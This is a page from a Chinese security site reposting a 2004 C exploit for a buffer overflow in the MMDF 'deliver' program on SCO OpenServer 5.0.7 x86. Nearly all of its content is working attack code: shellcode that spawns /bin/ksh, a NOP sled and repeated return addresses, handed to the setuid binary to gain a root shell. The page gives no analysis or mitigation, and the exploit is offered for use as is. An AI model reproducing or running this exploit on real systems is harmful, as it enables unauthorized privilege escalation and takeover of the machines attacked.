首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
来源:vfocus.net 作者:Carvalho 发布时间:2004-10-28  

/*
* MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
* Copyright 2004 Ramon de Carvalho Valle
*
*/

char shellcode[]= /* 36 bytes */
"\x68\xff\xf8\xff\x3c" /* pushl $0x3cfff8ff */
"\x6a\x65" /* pushl $0x65 */
"\x89\xe6" /* movl %esp,%esi */
"\xf7\x56\x04" /* notl 0x04(%esi) */
"\xf6\x16" /* notb (%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""/ksh" /* pushl $0x68736b2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\xb0\x3b" /* movb $0x3b,%al */
"\xff\xd6" /* call *%esi */
;

main(int argc,char **argv) {
char buffer[16384],address[4],*p;
int i;

printf("MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86\n");
printf("Copyright 2004 Ramon de Carvalho Valle\n\n");

*((unsigned long *)address)=(unsigned long)buffer-256+5120+4097;

sprintf(buffer,"-c");
p=buffer+2;
for(i=0;i<5120;i++) *p++=address[i%4];
for(i=0;i<8192;i++) *p++=0x90;
for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];
*p=0;

execl("/usr/mmdf/bin/deliver","deliver",buffer,0);
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·libxml2 Remote buffer overflow
·WvTftp option name heap overfl
·GD Graphics Library Heap Overf
·Linux Kernel<= 2.6.7 Firewa
·creating a asp command shell u
·MailCarrier 2.51 SMTP EHLO / H
·ShixxNote 6.net, Remote Buffer
·Socat <= 1.4.0.2 Format Str
·Apache<=1.3.31 mod_include
·PHP Array Heap Content Disclos
·Ability Server <= 2.34 Remo
·Microsoft Internet Explorer IF
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved